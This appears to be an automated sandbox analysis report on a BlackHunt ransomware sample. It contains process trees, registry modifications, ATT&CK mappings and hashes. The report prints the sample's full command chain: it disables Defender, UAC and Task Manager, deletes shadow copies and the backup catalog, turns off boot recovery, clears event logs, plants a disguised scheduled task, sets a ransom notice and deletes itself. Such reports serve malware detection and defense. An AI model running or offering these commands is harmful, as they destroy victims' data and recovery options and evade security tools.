53 PID 1700 wrote to memory of 2220 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 53 PID 1700 wrote to memory of 2220 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 53 PID 1700 wrote to memory of 2724 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 54 PID 1700 wrote to memory of 2724 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 54 PID 1700 wrote to memory of 2724 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 54 PID 1700 wrote to memory of 2724 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 54 PID 2704 wrote to memory of 2616 2704 cmd.exe 56 PID 2704 wrote to memory of 2616 2704 cmd.exe 56 PID 2704 wrote to memory of 2616 2704 cmd.exe 56 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe"C:\Users\Admin\AppData\Local\Temp\3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1700 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2772
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2832
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2824
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2748
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2720
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2852
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2220
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2724
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2672
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2564
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2632
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2992
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2812
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3008
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1808
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1016
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1332
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1656
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2184
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:948
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2548
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2868
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2872
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1692
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe" /F2⤵PID:1664
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe" /F3⤵
- Creates scheduled task(s)
PID:1200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2064
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2040
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2100
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2928
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2944
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2052
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1972
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:440
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2288
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1468
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:3124
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3348
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:3268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3192
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:3260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:1296
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3212
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:2436
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2608
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1692
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2964
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:2624
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2604
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2004
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3092
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:4092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3440
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3456
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3492
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:3616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3296
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:3804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3468
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3628
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3524
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:3992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3764
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:3656
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2216
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe"2⤵
- Deletes itself
PID:3872 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3756
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2196
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2548
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5ae6cf896cac042bfb28c579c6ba20aea
SHA1251ca88668628bad6087a84b3e72e4b42f718d6e
SHA256bf07761bdd96253f6c43889297403f3562422728932bcefca05644a4ddb397b6
SHA5125a600eb8b82322f74e2054a177e66c32554799ad196fd8c75ff89a791473cf0c101ed576294eb26693cb4c47269c8e6144b0ae07e8e2045adb1c64abdd67aa55
-
Filesize
12KB
MD516dc9f55505ff84cdfe4fbd5828cfee5
SHA1e981a9c0d39eee99b09578d310a053504523dd48
SHA2560ca46435bf6e2cff4eb875cac1471817b691860cb93d807f42338832c5199f54
SHA512772f5151aa78423cbe59a7911b6b96c5c274905e6ed93ac6c5c2547f5ea559b1b2f6fe964c5b4cc84dbe1131272075188521dcb05ddc13128cb1f2ea6187b6b3
-
Filesize
684B
MD594f4e0a5decb6e521e3aa4e72023ab1a
SHA16e12550bb75f6945d639d8633bb4a757ac340eae
SHA25671924ad402f0feb2b7b0da787d52d177314dc7a7f23d277c7d2ba7ee07c44f7a
SHA5123344250374a572f7212ac4bf6fd2c2082ac90fa41849370027d06b4452277ecb35891f536c57324f4b101af2ce847938001a2b37a047170be34f863a0efb75ec